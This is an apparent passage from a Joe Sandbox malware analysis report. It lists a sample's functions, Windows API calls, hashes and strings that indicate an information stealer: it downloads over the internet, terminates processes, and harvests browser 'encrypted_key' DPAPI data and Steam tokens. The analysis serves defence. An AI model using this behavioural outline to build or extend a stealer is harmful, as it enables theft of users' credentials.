                              • Instruction Fuzzy Hash: B751A171A102099BDB10EF64DC89BAE7BE4AF50355F156428FE89FB252DBB0DD04CB90
                              Function 00E35640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E3565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E35661
                              • InternetOpenA.WININET(00E5CFEC,00000000,00000000,00000000,00000000), ref: 00E35677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00E35692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00E356BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 00E356E1
                              • InternetCloseHandle.WININET(?), ref: 00E356FA
                              • InternetCloseHandle.WININET(00000000), ref: 00E35701
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 89e2b20ed6072dafdfafc502915579e482da671f00167d84eb03436526c49c8a
                              • Instruction ID: a840397db8217560a97239cc948d0bd53d19395f95d9c731c5af3024cbaf9536
                              • Opcode Fuzzy Hash: 89e2b20ed6072dafdfafc502915579e482da671f00167d84eb03436526c49c8a
                              • Instruction Fuzzy Hash: F4417171A00704EFDB24CF55D948BAABBB4FF44309F14806AEA08AB395D7769941CB94
                              Function 00E54740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E54759
                              • Process32First.KERNEL32(00000000,00000128), ref: 00E54769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E5477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E5479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E547AB
                              • CloseHandle.KERNEL32(00000000), ref: 00E547B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 00E547C0
                              • CloseHandle.KERNEL32(00000000), ref: 00E547CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 93b57a3df774238993e2f8acac315ef964aec7edd42278185758774ec19c6993
                              • Instruction ID: 450156cf5c404206e10e226cf54e57e9f6d14d41e0dac0585f40a303eab8ae5e
                              • Opcode Fuzzy Hash: 93b57a3df774238993e2f8acac315ef964aec7edd42278185758774ec19c6993
                              • Instruction Fuzzy Hash: A701B5B1641314AFE7305B609C89FEA77BCEB0975AF001582FE45E10C5EB798DC88B60
                              Function 00E483E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E48435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4846C
                              • lstrlen.KERNEL32(00000000), ref: 00E484B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E484E9
                              • lstrlen.KERNEL32(00000000), ref: 00E484FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4852E
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E4853E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4bbc8f4e9111dfd1dfb38e0f006369bc0b925082a985f9259d7e08d59fe0a0d4
                              • Instruction ID: 0500aa1aeac9afa61496a63c2c51c6a67a29f6da71adec688d210be325333dbf
                              • Opcode Fuzzy Hash: 4bbc8f4e9111dfd1dfb38e0f006369bc0b925082a985f9259d7e08d59fe0a0d4
                              • Instruction Fuzzy Hash: 3A51B2759002029FCB24DF28E588A5BBBF5EF98304F24945DEC99FB245EB35E941CB50
                              Function 00E52910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5292C
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E528A9), ref: 00E5294B
                              • RegQueryValueExA.ADVAPI32(00E528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E52965
                              • RegCloseKey.ADVAPI32(00E528A9), ref: 00E5296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: c8507e8c8c81d34e7ae93ea855c78be3e968223b4d0f845cca7adb1bc95fd2f8
                              • Instruction ID: e7b0dd3033d09be0d9f00a9f3688c976c9fde6a96cc4fd8fd45c99c4785d3c04
                              • Opcode Fuzzy Hash: c8507e8c8c81d34e7ae93ea855c78be3e968223b4d0f845cca7adb1bc95fd2f8
                              • Instruction Fuzzy Hash: 4201BC75600318BFE720CBA09859EAB7BBCEB4975AF104099FF85A7244E676590887A0
                              Function 00E52880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5289C
                                • Part of subcall function 00E52910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00E52925
                                • Part of subcall function 00E52910: RtlAllocateHeap.NTDLL(00000000), ref: 00E5292C
                                • Part of subcall function 00E52910: RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E528A9), ref: 00E5294B
                                • Part of subcall function 00E52910: RegQueryValueExA.ADVAPI32(00E528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00E52965
                                • Part of subcall function 00E52910: RegCloseKey.ADVAPI32(00E528A9), ref: 00E5296F
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BC38,00000000,00020119,00E49500), ref: 00E528D1
                              • RegQueryValueExA.ADVAPI32(00E49500,00D2F7D0,00000000,00000000,00000000,000000FF), ref: 00E528EC
                              • RegCloseKey.ADVAPI32(00E49500), ref: 00E528F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 04fa74ea22d62db5cd7d6e0dd4ef9e544fec5b93b5459afe458f959e64997672
                              • Instruction ID: 2c79e500d6a8161e9d3728a1f71a681a9ea23a39068721f02b97d7d2009e3596
                              • Opcode Fuzzy Hash: 04fa74ea22d62db5cd7d6e0dd4ef9e544fec5b93b5459afe458f959e64997672
                              • Instruction Fuzzy Hash: A101D671640308BFEB24DBA4EC4DFAA777CEB44316F004559FF48E3254D676994487A0
                              Function 00E371F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00E3723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00E37279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E37280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E372C3
                              • HeapFree.KERNEL32(00000000), ref: 00E372CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E37329
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: 14a234dcc1ce1b59ca848c4c09e7d8981440eee87488bdd5abbd51ff59d92b71
                              • Instruction ID: a957141db1cbb1391b2660189b3157470717ae21c6d50f940d2fdccb2140a757
                              • Opcode Fuzzy Hash: 14a234dcc1ce1b59ca848c4c09e7d8981440eee87488bdd5abbd51ff59d92b71
                              • Instruction Fuzzy Hash: 20416CB17056059BEB30CF69D888BAAB7E8EB84309F144569EC89D7310E635E900DB50
                              Function 00E4D7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00E4D7D6
                              • RegOpenKeyExA.ADVAPI32(80000001,00D2E438,00000000,00020119,?), ref: 00E4D7F5
                              • RegQueryValueExA.ADVAPI32(?,00D2F278,00000000,00000000,00000000,000000FF), ref: 00E4D819
                              • RegCloseKey.ADVAPI32(?), ref: 00E4D823
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4D848
                              • lstrcat.KERNEL32(?,00D2F290), ref: 00E4D85C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 1773701731a5b30a9b3f2337d2e574c6a575590406a3eb47d522a68e0bf4a12e
                              • Instruction ID: 44b47f4e525fd9fd6a62b191d4a38278e4d0968349e070669fa26314cb3c0053
                              • Opcode Fuzzy Hash: 1773701731a5b30a9b3f2337d2e574c6a575590406a3eb47d522a68e0bf4a12e
                              • Instruction Fuzzy Hash: 8941A57161020CAFDB64EF64EC86FDE77B4AF44304F009069F649A7251EE35AA85CF91
                              Function 00E39C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E39CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E39CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E39D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: f126084285424c50112dd8e011cbc4f11dcec78a6e307fe5a6d675ae9a12054a
                              • Instruction ID: 1ae7a0d3e6b9899611181b100dbabba186117f491a3167862993bf7df2005784
                              • Opcode Fuzzy Hash: f126084285424c50112dd8e011cbc4f11dcec78a6e307fe5a6d675ae9a12054a
                              • Instruction Fuzzy Hash: 3B41A171A002099BDB21EF64D84A6EEBFF4AF94308F446468E955B7253DBB0ED04C790
                              Function 00E4E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4EA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EA53
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4EA61
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4EA7A
                              • lstrcat.KERNEL32(?,00D28C58), ref: 00E4EA8D
                              • lstrcat.KERNEL32(?,00E61794), ref: 00E4EA9F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 91f265d21227da6d44e2ca10f7f1bf07d9724bfbdc44b56604bf1784c954f64e
                              • Instruction ID: d9726ff4bba3f15c3136bd2da72db283d502e38b306bd98e2d267033622d76a6
                              • Opcode Fuzzy Hash: 91f265d21227da6d44e2ca10f7f1bf07d9724bfbdc44b56604bf1784c954f64e
                              • Instruction Fuzzy Hash: C441C971910218AFCB21EB64DC45FED77B8FF48300F005899FB56A7245DA749E44DB50
                              Function 00E4ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4ECDF
                              • lstrlen.KERNEL32(00000000), ref: 00E4ECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4ED1D
                              • lstrlen.KERNEL32(00000000), ref: 00E4ED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00E4ED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
